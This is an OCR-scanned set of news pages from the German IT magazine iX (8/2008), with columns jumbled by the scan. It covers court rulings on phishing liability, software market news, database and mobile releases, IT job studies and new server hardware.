Daran fehlt es bei AGB, die 
Kunden häufig gar nicht erst 
durchlesen. Tobias Haar 
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Banken haften bei Phishing-Angriffen, wenn Kunde Sorgfalispflicht erfüllt 


Das Amtsgericht Wiesloch (Az. 
4 C 57/08) hat einer Bankkun- 
din Recht gegeben, die einen 
Schaden aus einem Phishing- 
Angriff nicht zahlen wollte. Bei 
einer Online-Überweisung fla- 
ckerte nach Eingabe von PIN 
und TAN plötzlich ihr Bild- 
schirm und wurde schwarz. Sie 
ging von einem technischen 
Fehler aus und setzte ihren 
Überweisungsvorgang fort. Erst 
durch einen Anruf ihrer Bank 
ein paar Tage später erfuhr sie, 
dass von ihrem Bankkonto ein 
Betrag in Höhe von 4000 Euro 
für eine Ebay-Transaktion ab- 
gebucht worden war. Bedeut- 
sam war noch, dass der PC der 
Bankkundin nach Aufdeckung 
der Phishing-Attacke fachmän- 
nisch untersucht wurde und dar- 
auf — trotz aktivierter gängiger 
Antiviren-Software — insgesamt 
14 schadhafte Programme ent- 
deckt wurden. Eines davon 
diente dem Keylogging. In der 
Folgezeit stritten sich Bank- 
kundin und Bank darum, wer 
diesen Schaden zu tragen hat- 
te. Da die Überweisung nach- 
weislich nicht von der Bank- 
kundin stammte, lehnte der 
Wieslocher Richter ihre Haf- 
tung ab. „Das Fälschungsrisiko 
des Überweisungsauftrags trägt 


Während etliche Gerichte wie 
insbesondere das Landgericht 
Hamburg den Forenbetreibern 
die Pflicht auferlegen, Foren- 
beiträge vor deren Freischal- 
tung zu „zensieren“, wider- 
spricht dem das Amtsgericht 
München (Az. 142 C 6791/08) 
ausdrücklich. Nach Auffassung 
des Richters würde eine solche 
Vorabzensur zu einer nicht hin- 
nehmbaren Einschränkung des 
Rechts auf freie Meinungsäu- 
Berung zugunsten allgemeiner 
Persönlichkeitsrechte führen. 
Würde man eine solche Kon- 
trollpflicht fordern, „würde der 
vom Verfassungsgeber ge- 
wünschte, wohl zum Großteil 
nicht rechtsverletzende Mei- 
nungsaustausch ‚abgewürgt‘“, 
heißt es im Urteil. Auch der 
BGH habe letztlich befunden, 
„dass Überwachungsmaßnah- 
men, welche das Geschäftsmo- 
dell infrage stellen, nicht ge- 
fordert werden können“, so der 
Münchner Richter in diesem 
Fall. Tobias Haar 
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die Bank“, heißt es in der Ur- 
teilsbegründung. Als Beweis 
dafür, dass die Bankkundin 
den Auftrag nicht autorisiert 
hatte, diente hier auch, dass die 
Mittelsfrau, die das erschliche- 
ne Geld nach Russland weiter- 
geleitet hatte, aufgespürt wer- 
den konnte. In vergleichbaren 
Fällen war bislang meist der 


Kunde als „Schuldiger“ zum 
Tragen des Schadens verur- 
teilt worden. Denn diesen 
trifft die Sorgfaltspflicht beim 
Onlinebanking, eine aktuelle 
Anti-Virensoftware, eine Fire- 
wall und regelmäßige Updates 
zu nutzen, um Phishing zu 
vermeiden. Diese Pflicht hat 
die Bankkundin im vorliegen- 


den Fall aber nicht verletzt. 
„Wenn die Bank möchte, dass 
die Kunden eine bestimmte Vi- 
renschutzsoftware benutzen, 
müsste sie das in den allgemei- 
nen Geschäftsbedingungen fest- 
halten“, sagte Rechtsanwalt 
Stefan Schilling, der die Bank- 
kundin vertreten hatte. 

Tobias Haar 
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MARKT + TRENDS 


Standardsoftware 


Bislang war der Einsatz von 
Tools für das Geschäftspro- 
zessmanagement wie Aris 
ausschließlich Sache von Spe- 
zialisten. Nach Ansicht des 
Herstellers IDS Scheer wird 
sich das Anwenderspektrum 
ausdehnen: auf IT-Architekten, 
Systemverantwortliche, Fach- 
abteilungen und Prozessverant- 
wortliche. In Abkehr von sei- 
ner bisherigen Politik bringt 
das Saarbrücker Softwarehaus 
nun ergänzend eine eigene Ab- 
lauf- und Ausführungsumge- 
bung für Prozessmodelle auf 
den Markt. Um die zu nutzen, 
werden die EPK-basierten (Er- 
eignisgesteuerte Prozesskette) 
Aris-Modelle zunächst auto- 


Übernahme: SAP kauft die 
US-amerikanische Visiprise 
für einen nicht genannten 
Preis. Mit dem Anbieter inte- 
grierter Fertigungslösungen 
bestehen bereits seit zwei 
Jahren geschäftliche Bezie- 
hungen. Seit Sommer ver- 
gangenen Jahres verkauft 
SAP das Produkt Visiprise 
Manufacturing bereits unter 
dem Namen „Manufacturing 
Execution by Visiprise“ auf 
eigene Rechnung. 


Per Telefon: Innovation 
Gates SaaS-Angebot Business 
Essentials erhält eine iPhone- 
Schnittstelle. Anwender der 
Unternehmenssoftware kön- 
nen ab der Version 1.4 Kon- 
taktdaten über das iPhone 
abrufen. Ein zunächst gehos- 
tetes Business Essentials 
lässt sich bei Bedarf auf ei- 
nen eigenen Server migrie- 
ren. Der Hersteller stellt dazu 
die Daten in einer MySQL- 
Datenbank zur Verfügung. 


Mobiler Service: Materna 
hat das Produkt Handyman 
des norwegischen Unterneh- 
mens ePocket Solutions in 
sein Vertriebsprogramm 
aufgenommen. Mit der An- 
wendung lassen sich Ser- 
vice-Aufträge mit mobilen 
Geräten bearbeiten. Eine 
XML-Schnittstelle ermög- 
licht die Integration in ERP- 
und Service-Management- 
Systeme. Anbindungen gibt 
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matisiert in die Modellnotation 
BPMN (Business Process Mo- 
deling) überführt. 

Im Unterschied zu markt- 
gängigen BPMN-Maschinen, 
die in der Regel operative Pro- 
zesse steuern, führt die Aris 
Governance Engine übergeord- 
nete Prozessregeln aus. Typi- 
sche Einsatzfelder sind die 
Compliance-Vorgaben nach 
Sarbanes-Oxley, Basel II oder 
Produkthaftungen. Der Work- 
flow von Kontrollaufgaben 
lässt sich in SOA-Infrastruktu- 
ren ebenfalls mit der Gover- 
nance Engine durchführen (wer 
definiert einen Service, wer 
gibt ihn frei, wann wird er von 
wem aktiviert oder deaktiviert). 


es bereits für BMCs Remedy, 
Microsofts Dynamics AX so- 
wie Dynamics NAV. In die- 
sem Jahr sollen solche für 
SAP XI und IBM Tivoli hin- 
zukommen. 


Abgestoßen: SAP möchte 
nicht das gesamte Produkt- 
angebot der übernommenen 
Business Objects behalten. 
Getrennt hat man sich etwa 
vom Beteiligungsmanage- 
ment, zu dem der BI-Spezia- 
list selbst erst durch die Über- 
nahme von Cartesis kam. 
Käufer ist Zetvisions, das nun 
die Anwender von Cosmos 
und Insighter betreuen will. 


Mehr Funktionen: Die 
Schweizer Soreco AG bringt 
Release 4.0 der SOA-Ent- 
wicklungsplattform Xpert.ivy 
heraus. Neben der Entwick- 
lung, Umsetzung und Über- 
wachung von Prozessen und 
Webservices kann der Be- 
nutzer damit nun auch RIA- 
Oberflächen (Rich Internet 
Application) zusammen- 
stellen. 


Hilfestellung: Rightnow 
arbeitet mit dem IT-Bera- 
tungsunternehmen Danet 
zusammen. Ziel ist die Ver- 
marktung von Rightnows 
Miet-CRM-Software im 
deutschsprachigen Raum. 
Danet soll dazu kundenspe- 
zifische Anwendungen mit 
Rightnows Werkzeugen ent- 
wickeln. Das Weiterstadter 
Unternehmen ist mit einem 
eigenen On-Demand-Service 
(Order-to-Cash) präsent. 


SCM-Software: SAP vor Oracle 


Ungebrochen groß ist das Inter- 
esse an Software für das Supply 
Chain Management (SCM). Im 
vergangenen Jahr stieg die 
Nachfrage nach entsprechenden 
Angeboten weltweit laut Statis- 
tik der US-Beratung Gartner 
um fast 18% auf 6 Mrd. Dollar. 
Allerdings sind 4 % davon al- 
lein dem schwachen Dollarkurs 
zu verdanken. Insbesondere bei 
SAP und Oracle lässt das 
Wachstum die Kassen klin- 
geln. Die beiden Anbieter von 
Unternehmenssoftware legten 
im SCM-Segment überdurch- 
schnittlich zu. Dabei hatte SAP 
wieder einmal die Nase vorn. 
Das Unternehmen steigerte sei- 
nen Umsatz 2007 um knapp 


32 % auf 1,3 Mrd. Dollar. Larry 
Ellisons Firma verzeichnete 
hingegen „nur“ 26 % Zuwachs 
und blieb mit den Einnahmen 
knapp unter der 1-Mrd.-Dol- 
lar-Grenze. Hinter dem Plus 
von JDA (67,4 %) blieben die 
Wachstumsraten von SAP und 
Oracle indes deutlich zurück. 
Ein Blick auf den Markanteil 
(3,9 %) zeigt jedoch, dass die 
Nummer drei der Branche sich 
weit abgeschlagen hinter den 
beiden führenden Firmen ein- 
reiht. An dem immer noch stark 
zersplitterten SCM-Markt än- 
derte auch der Konsolidierungs- 
trend der vergangenen Jahre 
nichts — seit 2005 gab es mehr 
als 85 bedeutende Übernahmen. 


Unternehmen 

SAP 1,334 22,4 
Oracle 0,955 16,0 
JDA Software 0,230 3,9 
Ariba 0,160 2 
Manhattan Ass. 0,152 2,6 
andere 3,132 52,5 
gesamt 5,963 100,0 


Umsatz 2007 Marktanteil Umsatz 2006 Marktanteil Wachstum 


1,02 20,0 319 
0,758 149 26,1 
0,137 2 67,4 
0,151 3,0 63 
0,135 21 13,0 
2879 56,8 8,8 
5,070 100,0 178 


Palo stellt MOLAP-Server vor 


Ende Juni brachte die Jedox 
AG die Version 2.5 ihres 
OLAP-Systems Palo auf den 
Markt. Der Open-Source-Server 
verwaltet Spreadsheet-Dateien 
und bietet nun eine optimierte 
In-Memory-MOLAP-Engine 
(Multidimensional Online Ana- 
lytical Processing) einschließ- 
lich eines lokalen Cache. Dar- 
über hinaus verfügt Palo über 
einen verbesserten Formeledi- 
tor sowie erweiterte Abfragen. 
Das System lässt sich zusam- 


men mit Palos ebenso unter der 
GPL stehendem ETL-Server 
(Extract, Transform, Load) be- 
treiben, der die Extraktion und 
Transformation von Stamm- 
und Bewegungsdaten aus hete- 
rogenen Quellen in eigene Mo- 
delle ermöglicht. Mit der neuen 
Version ist es erstmals mög- 
lich, aus den verdichteten Zah- 
len heraus via ETL-Server bis 
auf die untere Belegebene der 
operativen Datenbasis durchzu- 
greifen. 


Zollabwicklung On-Demand 


Mit Unterstützung des Berli- 
ner IT-Zoll-Experten Softzoll 
offeriert EDI-On-Demand-An- 
bieter Crossgate eine Plattform 
für die automatische Zollab- 
wicklung nach Atlas (Auto- 
matisiertes Tarif- und lokales 
Zoll-Abwicklungs-System). Ab 
dem 1. Juli 2009 ersetzt Atlas 
das papiergestützte Ausfuhr- 
verfahren durch die elektroni- 
sche Variante. Sie ist für alle 
Unternehmen verpflichtend, 
die Warenaustausch mit Nicht- 
EU-Mitgliedern betreiben. Neh- 


men Unternehmen den ent- 
sprechenden Service über die 
B2B-Plattform (Business-to- 
Business) von Crossgate in 
Anspruch, werden die Daten 
automatisch an Softzoll weiter- 
geleitet, der eventuell fehlende 
Informationen ergänzt. Im An- 
schluss generiert das Produkt 
die Transportbegleitpapiere und 
stellt sie dem Zoll als PDF- 
Dokument per E-Mail zu. Die 
Plattform bietet Standard- 
schnittstellen zu über 20 ERP- 
Lösungen. 
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MARKT + TRENDS 


Datenbanken/Mobile 


MySQLs Falcon-Engine ohne Führung 


Jim Starkey ist nach knapp 
zweieinhalb Jahren bei MySQL 
AB ausgeschieden. Er war 
dort als Architekt der für 
MySQL 6 angekündigten trans- 
aktionsfähigen Datenbank-En- 
gine Falcon tätig. Starkey blickt 
auf eine lange Geschichte als 
Datenbankentwickler zurück: 
Bis 1984 hatte er bei Digital 
Equipment an verschiedenen 
Projekten gearbeitet. Anschlie- 
Bend entwickelte er Interbase, 
das nach mehrmaligem Be- 
sitzerwechsel schließlich bei 
Borland landete. Aus den 
2000 freigegebenen Quellen 
entstand zwei Jahre später die 
Open-Source-Datenbank Fire- 
bird. Starkey war angeblich 
wegen einer grundsätzlichen 
Abneigung gegen Open Source 


an diesem Projekt nicht inter- 
essiert. 

Falcon soll die erste von 
MySQL AB selbst entwickelte 
Engine mit Transaktionsfähig- 
keiten sein. Oracle hatte vor ei- 
nigen Jahren das bislang mit- 
ausgelieferte InnoDB ebenso 
wie die früher verwendete 
Berkeley DB gekauft. SolidDB, 
das ebenfalls Transaktionen und 
einen Anschluss an MySQL 
bot, erfährt seit der Übernahme 
durch IBM keine sichtbare Ent- 
wicklung mehr. 

Die Falcon-Entwickler ge- 
ben sich optimistisch, ihre Ar- 
beit trotz Starkeys Weggang 
beenden zu können. Blog-Ein- 
träge weisen darauf hin, dass 
manche dem Projekt jetzt sogar 
bessere Chancen einräumen. 


Release-Kandidat für SQL Server 2008 


Seit Mitte Juni bietet Microsoft 
einen ersten Release-Kandida- 
ten der kommenden Version 
seines SQL Server zum Her- 
unterladen an (s. iX-Link). Ur- 
sprünglich hatte es die fertige 
Version für Februar avisiert, 
mittlerweile soll sie im dritten 
Quartal erscheinen. Kurz nach 
dem Release-Kandidaten ver- 
öffentlichte der Hersteller ein 
Feature-Pack bestehend aus 
einzeln installierbaren Teilen. 
Sein Schwerpunkt liegt auf 


Handy als Diktaphone: 

Mit der Software ProMobile 
der Berliner Firma Brain- 
works können Blackberrys 
und Nokia-Smartphones als 
Diktiergeräte fungieren. Zur 
Steuerung der Aufnahme die- 
nen die Handy-Tasten. Per 
E-Mail, UMTS/GPRS oder 


Data-Mining-Aufgaben: Ein 
OLE-DB-Provider soll als 
COM-Komponente bei OLAP- 
Vorhaben helfen, Add-ins für 
Office 2007 übermitteln Ana- 
lyseergebnisse aus dem Server 
an Excel und Vibrio. Außer- 
dem gehört der SQL Server 
Compact 3.5 SP1 zu dem Fea- 
ture-Pack, das die Datenbank 
direkt in andere Anwendungen 
einbettet. 


Eix-ink ix0808023 


WLAN kann man die Diktate 
versenden, auch an digitale 
Diktiersysteme. 


Alte Handys liegen rum: 
Die Recycling-Quote bei 
Mobiltelefonen liegt nach ei- 
ner Untersuchung von Nokia 
bislang nur bei rund 3 %. 
Gäbe jeder der drei Milliar- 
den Handy-Besitzer eines 
zurück, spare dies 240.000 
Tonnen Rohstoffe ein. 


API verheiratet Web 2.0 mit dem Handy 


Zwar lassen sich Web-2.0-An- 
wendungen per Ajax im Prinzip 
mobil ebenso nutzen wie statio- 
när. Allerdings ist aus Sicher- 
heitsgründen in beiden Fällen 
noch kein Zugriff auf lokale 
Funktionen und Daten möglich. 
Den will die OMTP-Gruppe 
(Open Mobile Terminal Plat- 
form) aus AT&T, Hutchison 
3G, Orange, T-Mobile, Voda- 
fone und anderen mit ihrer API 


„Bondi“ schaffen. Diese ein- 
heitliche Schnittstelle soll eine 
sichere Kommunikation zwi- 
schen Handy-Betriebssystem 
und Browser ermöglichen und 
dadurch etwa das Nutzen der 
vom GPS-Modul gelieferten ak- 
tuellen Position erlauben. Eine 
erste Spezifikation will OMTP 
Ende des Jahres vorlegen. 


Eix-ink ix0808023 


Neue Versionen der Berkeley DB 


Oracle stellt gleichzeitig für al- 
le drei Editionen seiner ein- 
gebetteten freien Datenbank 
„Berkeley DB“ neue Versionen 
bereit. Berkeley DB 4.7 steht 
erstmals für das Echtzeitbe- 
triebssystem QNX RTOS zur 
Verfügung; es soll den Cache 
besser ausnutzen und dadurch 
höheren Durchsatz bringen. 
Ebenfalls neu ist die Integra- 
tion des in der Java-Ausgabe 
mit Version 3 eingeführten Di- 
rect Persistence Layer (DPL, s. 
iX-Link), der das dauerhafte 
Speichern von Objekten ohne 
den Umweg über einen objekt- 
relationalen Mapper übernimmt. 
In DPL definieren Java-Anno- 


tationen die Persistierung eben- 
so wie die nötigen Metainfor- 
mationen. 

In der XML-Ausgabe ist die 
XQuery-Update-Funktion (bis- 
lang ein Vorschlag des W3C) 
hinzugekommen. Damit lassen 
sich Knoten in XML-Doku- 
mente einfügen, löschen und 
ändern. Ein kostenorientierter 
Optimierer soll den Durchsatz 
erhöhen. Laut Oracle skaliert 
die Java-Edition der Datenbank 
besser und arbeitet schneller; 
sie unterstützt Googles mobile 
Plattform Android und Apache 
Maven. 


Eix-ink ix0808023 


Nokia übernimmt Symbian komplett 


Bis Mitte nächsten Jahres will 
Nokia sämtliche Anteile an 
Symbian Inc übernehmen und 
das gleichnamige Betriebssys- 
tem unter eine freie Lizenz 
stellen. Betreuen soll es in Zu- 
kunft die Symbian Foundation, 
zu deren Gründungsmitgliedern 
neben Nokia die Geräteher- 
steller Sony Ericsson, Motorola 
und NTT-Docomo gehören. 
Sie wollen ihre jeweiligen 
GUI-Aufsätze ebenfalls in die 
Foundation einbringen: von 
Docomo kommt MOAP, von 
Sony Ericsson UIQ und von 
Nokia S60. 


Außerdem beteiligen sich 
AT&T, LG Electronics, Sam- 
sung, STMicroelectronics, Te- 
xas Instruments und Vodafone. 
Einige von ihnen gehören 
gleichzeitig zur Open Handset 
Alliance und damit zu den 
Unterstützern des Linux-Deri- 
vats Android. Über die techni- 
schen Vorzüge von Symbian 
gegenüber dem von Google 
entwickelten Newcomer äu- 
Berten sich die Firmen nicht — 
man könne jedoch mit 200 
Millionen Nutzern und vier 
Millionen Entwicklern wu- 
chern. 


iX 8/2008 


23 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


24 


MARKT + TRENDS 


Business-Software 


Teamarbeit an verteilten Wissenskarten 


Mindjet hat seinen Mind Ma- 
nager Pro, ein Werkzeug zur 
Erstellung sogenannter Mind 
Maps, mit einer im Mietmo- 
dus angebotenen Kollabora- 
tionsplattform namens Con- 
nect erweitert. Die Software 
soll es Teammitgliedern ermög- 
lichen, „Wissenskarten‘“ aufzu- 
bauen, zu diskutieren und ge- 
meinsam weiterzuentwickeln. 
In den Mind Maps führen die 
Benutzer Daten unterschied- 
licher Ausprägung und aus 
verschiedenen Quellen zusam- 
men. Sie können Onlinekonfe- 


renzen und Chats anstoßen so- 
wie Whiteboards für die Prä- 
sentation von Ideen und Pro- 
jektplänen einrichten. Noch 
benötigt man für den Betrieb 
den Mind Manager, im Laufe 
dieses Jahres soll jedoch ein 
browserfähiger Client hinzu- 
kommen, der keine lokale In- 
stallation mehr benötigt. Die 
Online-Arbeitsbereiche liegen 
auf einem Server bei Mindjet. 
Connect gibt es in drei Ausfüh- 
rungen, die zwischen 9,99 Euro 
und 24,99 Euro pro Person und 
Monat kosten. Susanne Franke 


Kunden-Feedback mit Web 2.0 


Der On-Demand-CRM-Anbie- 
ter Rightnow hat seine Mai-08- 
Release veröffentlicht. Bei den 
Verbesserungen dieser Version 
konzentrierte sich das Soft- 
warehaus vor allem auf Feed- 
back-Funktionen für die Mo- 
dule Service, Marketing und 
Vertrieb. Das Produkt umfasst 
eine neue Online-Chat-Funk- 
tion, über die Servicemitarbei- 
ter Kundenfragen beantworten 


können. Befragungen zur Zu- 
friedenheit mit den Produkten 
oder der Dienstleistung sind 
ebenfalls in die Chat-Anwen- 
dung eingebunden. Sie sollen 
nach der Interaktion mit ei- 
nem Serviceagenten ausgelöst 
werden. Diese Umfragen sind 
auch in der Lage, Informa- 
tionen von anonymen Online- 
kunden automatisch zu erfas- 
sen. Susanne Franke 


Entwicklungsprozesse besser geplant 


Softwareentwicklung als ganz- 
heitlich angelegter Geschäfts- 
prozess ist immer noch die 
Ausnahme. Borlands Manage- 
ment Solutions (BMS, voraus- 
sichtlich ab Herbst verfügbar), 
gibt Unternehmen die Möglich- 
keit, die Kernprozesse der An- 
wendungserstellung zu messen 
und zu steuern — von der Anfra- 
ge bis zur Auslieferung. Die 
Plattform baut auf Borlands 
Open ALM-Struktur (Applica- 
tion Lifecycle Management) auf 
und soll allen Beteiligten einen 
vollständigen Überblick über 


Cobol und .Net: Micro Fo- 
cus’ Cobol-Entwicklungsum- 
gebung .Net Express with 
‚Net 5.1 unterstützt die aktuel- 
len Versionen von Microsofts 
IDE Visual Studio und das 
‚Net Framework. Somit kann 
der Entwickler Cobol-An- 
wendungen für .Net innerhalb 
von Visual Studio erstellen — 
inklusive der Geschäftsabläu- 
fe, des Datenzugriffs sowie 


sämtliche Entwicklungsprozes- 
se verschaffen. BMS besteht 
aus drei Werkzeugen: Team 
Demand bietet den Kollegen 
außerhalb der IT einen Blick 
auf die Projektanforderungen. 
Die Multiprojektmanagement- 
Umgebung Team Focus unter- 
stützt diverse Entwicklungspro- 
zesse (agil, iterativ, Wasserfall) 
und liefert Wissenswertes über 
das IT-Portfolio sowie den 
Projektverlauf. Team Analytics 
schließlich ist ein Werkzeug 
zur Konsolidierung von Pro- 
jektinformationen. 


einer grafischen oder web- 
basierten Bedienoberfläche. 


Jupitermond: Die jährliche 
Eclipse-Release ist verfügbar, 
diesmal unter dem Namen 
Ganymede. Sie beinhaltet Pro- 
grammpakete von 23 Eclipse- 
Projektteams. Sieben ver- 
schiedene Programmpakete 
decken unterschiedliche An- 
wendungsgebiete ab. Neu ist 
beispielsweise das Equinox p2 
Provisioning-System, das den 
bisherigen Update Manager 
ersetzt. 
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Beruf 


Bedarf an IT-Freelancern ungebrochen 


Der Einsatz externer IT-Spezi- 
alisten hat sich in Deutschland 
etabliert. Dies belegen Ergeb- 
nisse der Untersuchung „Exter- 
ne IT-Spezialisten in Deutsch- 
land 2008“, für die im Auftrag 
der Hays AG rund 160 IT/TK- 
Leiter in Unternehmen mit 
mindestens 500 Mitarbeitern 
befragt wurden. 

Heute greifen mehr als 70 % 
der Unternehmen mit mehr als 
500 Mitarbeitern auf externe 
IT-Spezialisten zurück. Einer 
Studie der Berlecon zufolge soll 
dieser Anteil in den kommen- 
den zwölf Monaten auf über 
80 % steigen. Jede achte der 
befragten Firmen setzt derzeit 
mehr als 20 IT-Freelancer ein. 
Das Aufgabenspektrum der 


IT-Arbeit macht krank 


Nach einem Arbeitspapier des 
RISP (Rhein-Ruhr-Institut für 
Sozialforschung und Politikbe- 
ratung e. V.) führt die Beschäf- 
tigung in der IT zu erheblichen 
gesundheitlichen Belastungen 
(www.risp-duisburg.de/abtpro/ 
prolog/ArbeitspapierITG1.pdf). 
Das Papier zitiert Studien, nach 
denen IT-Beschäftigte in den 
Softwareentwicklungs- und Be- 
ratungsprojekten bis zu viermal 
so häufig unter psychosomati- 
schen Beschwerden (chronische 
Müdigkeit, Nervosität, Schlaf- 
störungen und Magenbeschwer- 
den) leiden wie der Durch- 
schnitt der Beschäftigten in 


Langweilig: Meldungen über 
den Mangel an IT-Fachleuten 
sind häufig zu vernehmen. 

In Großbritannien suchte die 
CRAC (The Career Develop- 
ment Organisation) nach Ur- 
sachen, warum das IT-Stu- 
dium trotz der hervorragenden 
Berufsaussichten so wenig 
Zulauf hat. Das Ergebnis: 
Mehr als 60 % der Nicht-IT- 
Studenten empfinden IT-Jobs 
einfach als zu langweilig. 


Spezialisiert: Die Fachhoch- 
schule Trier startet mit dem 
kommenden Wintersemester 
den neuen Bachelor-Studien- 
gang „Internetbasierte Syste- 
me“ (www .fh-trier.de/go/ibs). 
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„Gastarbeiter“ ist vielschichtig. 
Die meistverbreiteten Einsatz- 
felder sind derzeit Softwareent- 
wicklung und -integration so- 
wie Aufgaben im SAP-Umfeld. 
Überproportional steigen soll 
künftig der Einsatz von Exter- 
nen als Berater und Planer. Aus 
diesem Grund stehen Bera- 
tungskompetenz und Kommu- 
nikationsstärke an der ersten 
Stelle bei der Auswahl externer 
IT-Spezialisten. Mehr als 80 % 
der Unternehmen weisen diesen 
Softskills eine große oder sehr 
große Bedeutung zu. Kritisch 
beurteilen die Firmen (60 %) 
den Einsatz von IT-Freelancern 
allein in den Punkten Einarbei- 
tungszeit sowie Aufwand für 
Steuerung und Koordination. 


Deutschland. 40 % der Befrag- 
ten zeigten eine Zunahme chro- 
nischer Erschöpfung, einem 
Frühindikator für das Burnout, 
30 % hatten Probleme, sich zu 
erholen. Nach dem Gesund- 
heitsreport der Techniker-Kran- 
kenkasse liegt der Gebrauch 
von Antidepressiva bei IT-Be- 
schäftigten um 60 % höher als 
im Durchschnitt aller Beschäf- 
tigten. In Sachen Psychophar- 
maka soll er sogar um 91 % hö- 
her ausfallen. Diese Aussage 
bezieht sich nur auf die über die 
Krankenkasse abgewickelten 
Rezepte; die Dunkelziffer dürf- 
te noch darüber liegen. 


Die Schwerpunkte des spezia- 
lisierten Studiengangs liegen 
auf der Softwareentwicklung 
für verteilte Anwendungen 
sowie dem Aufbau, der Ad- 
ministration und dem Betrieb 
von Rechnernetzen. 


Handlungsreisende: Berufs- 
einsteiger in der IT-Branche 
müssen sich auf häufige Ge- 
schäftsreisen einstellen. Zu 
diesem Fazit gelangt die PPI 
AG in ihrer Studie „IT-Job- 
scout“. 44% der Stellenaus- 
schreibungen verlangen da- 
nach von den Bewerbern im 
schönsten Managerdeutsch, 
„Kunden räumlich flexibel zur 
Verfügung zu stehen“. Von 
berufserfahrenen Mitarbeitern 
wird nur bei knapp 25 % Rei- 
sebereitschaft erwartet. 
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Systeme 


Der nächste Schritt: 
BS2000 auf Xeon-Server 


Angekommen in der Intel- 
Welt ist Fujitsu Siemens 
Computers (FSC) mit einem 
Vorhaben, das 1996 mit 
RISC-Prozessoren von Mips 
begann und später mit 
Sparcs weiterging — nämlich 
Mainframes im Einstiegs- 
segment aus Standardkom- 
ponenten zu bauen. 


Für den Einsteiger-Mainframe 
SQ100 sieht FSC acht vorkon- 
figurierte Modelle vor: Vier 
Ein-Sockel-Systeme mit einer 
Leistung von 12 bis 60 RPF 
(Relativer Performance-Fak- 
tor, I RPF entspricht circa 1,5 
MIPS), zwei Dual-Sockel- 
Modelle sowie je ein Drei- be- 
ziehungsweise Vier-Sockel- 
System mit maximal 200 RPF 
— alle ausschließlich bestückt 
mit Intels Quad-Core-CPUs 
Xeons MP E7220 (2,93 GHz). 
Jeder Server lässt sich mit 
weiteren Prozessoren, etwa 
zur Verschlüsselung, und nach 
Bedarf zuschaltbaren CPUs 
ausbauen. 

Um die Systeme auf das 
Verfügbarkeitsniveau der 
Mainframe-Welt zu heben, 
nutzt FSC die Fähigkeiten von 
Intels Memory-Controller wie 
ECC (Error Correction Code), 
Memory Scrubbing (regelmä- 
Biges Speicherprüfen) und Me- 
mory Mirroring. Das Spiegeln 
der FB-DIMMs reduziert ihre 
verfügbare Kapazität von stan- 
dardmäßig 8 (ein Sockel) res- 
pektive 16 GByte und 128 
GByte maximal auf jeweils die 
Hälfte. Davon bekommt das 
Betriebssystem etwa 70 % zu 
Gesicht, also maximal 44 
GByte — den Rest nutzt die 
Firmware. 

Als Heimstatt für das Be- 
triebssystem nutzt FSC vier 
2,5"-SAS-Platten mit je 146 
GByte, paarweise gespiegelt. 
Ihre Steuerung übernimmt ein 


SAS-RAID-Controller in ei- 
nem PCI-Express-x4-Slot. Ein 
LTO-3-Laufwerk samt Off- 
board-SCSI-Controller (eben- 
falls PCIe x4) und ein DVD- 
RW-Laufwerk (SATA) sind 
ebenfalls mit dabei. Zwei wei- 
tere PCIe-x4- und vier PCle- 
x8-Slots nehmen zusätzliche 
Karten für die Kommunika- 
tion mit der Außenwelt per 
Gigabit Ethernet, Fibre Chan- 
nel und SAS auf - die vier 
GBit-Ethernet-Ports sind nur 
für die SQ100-internen LAN- 
Verbindungen und den An- 
schluss an das Admin-LAN 
nutzbar. Für den VGA-An- 
schluss ist ein KVM-Switch 
vorgesehen. Integriert ist au- 
ßerdem ein IPMI-2.0-kompa- 
tibler Remote Management 
Controller. 


Virtueller Mainframe 


Die Server der SQ-Serie nut- 
zen als Betriebssystem OSD/ 
XC Version 4, das sich tech- 
nisch auf dem Niveau des 
jüngsten BS2000/OSD Ver- 
sion 8 befindet. Für die Binär- 
kompatibilität vorhandener 
Mainframe(BS2000-)-Anwen- 
dungen sorgt eine Emulations- 
schicht, die FSC in der nächs- 
ten Generation um einen 
Hypervisor — voraussichtlich 
Xen - ergänzen will. 

Zum Jahresschluss will der 
Hersteller das erste Modell 
der SQ-Business-Server unter 
BS2000/OSD Pilotkunden zur 
Verfügung stellen. Im Früh- 
jahr 2009 sollen die Maschi- 
nen allgemein verfügbar sein. 
Für den Herbst 2009 plant das 
Systemhaus Modelle, die per 
Virtualisierung bis zu acht 
BS2000-Gastsysteme parallel 
unterstützen. Im Folgejahr soll 
der Mischbetrieb von BS2000, 
Linux und Windows hinzu- 
kommen. Achim Born 


Nvidia macht seinem Tesla-Prozessor Beine 


Auf der International Super- 
computing Conference (ISC) 
in Dresden stellte Nvidia die 
zweite Generation seiner Tes- 
la-Prozessoren vor. Das Com- 
puting-System S1070 im 1-U- 
Gehäuse erreicht mit seinen 4 
Prozessoren (240 Rechenein- 
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heiten pro Prozessor) und 
16 GByte RAM bis zu 
4 TFlops — und soll dabei nur 
700 W elektrische Leistung 
benötigen. Der Koprozessor 
C1060 mit nur einem Tesla- 
Prozessor und 4 GByte RAM 
leistet immerhin I TFlops, be- 


IBMs AS/400 wird 20 


Am 21. Juni 1988 stellte IBM 
die damals neue Rechnerserie 
AS/400 vor. In den letzten Jah- 
ren nahm der Hersteller meh- 
rere Namensänderungen vor: 
iSeries (2000), iSeries iS 
(2003), System i5 (2006) und 
System i (2007). Heute sind 
laut IBM weltweit noch mehr 
als 400000 Installationen in 
über 245 000 Firmen in Betrieb, 
davon etwa 10.000 Unterneh- 
men aus Deutschland. 

Das Preis-Leistungs-Ver- 
hältnis des „Anwendungssys- 
tems“ (AS) mit den vom Start- 
schuss weg mehr als 1000 
kaufmännischen Programm- 
paketen vieler Softwarehäuser 
galt anfangs als sensationell 
günstig. Als Arbeitspferd für 
kaufmännische Aufgaben wie 
Finanz- und Personalwesen, 
Produktionsplanung oder Wa- 
renwirtschaft gedacht, kostete 
das Einstiegsmodell B1O mit 
2,9 CPW Rechnerleistung 
(Commercial Processing Work- 
load), 600 MByte Plattenspei- 
cher und 4 MByte Hauptspei- 
cher damals 38 000 Mark, das 
Topmodell B60 (mit 15,1 CPW 
für maximal 480 Benutzer) 
500 000 Mark. Erstmals be- 
nutzte IBM moderne Methoden 
der Fernbetreuung mit einge- 
bautem Service-Prozessor und 
Modem, sodass die Maschine 
mit den damals günstigsten 
Wartungskonditionen im Markt 
aufwarten konnte. 

Zum Vergleich: Das neue 
Einstiegsmodell Power 520- 
M15 Express mit einem Prozes- 
sorkern (4,2-GHz-Power6) leis- 
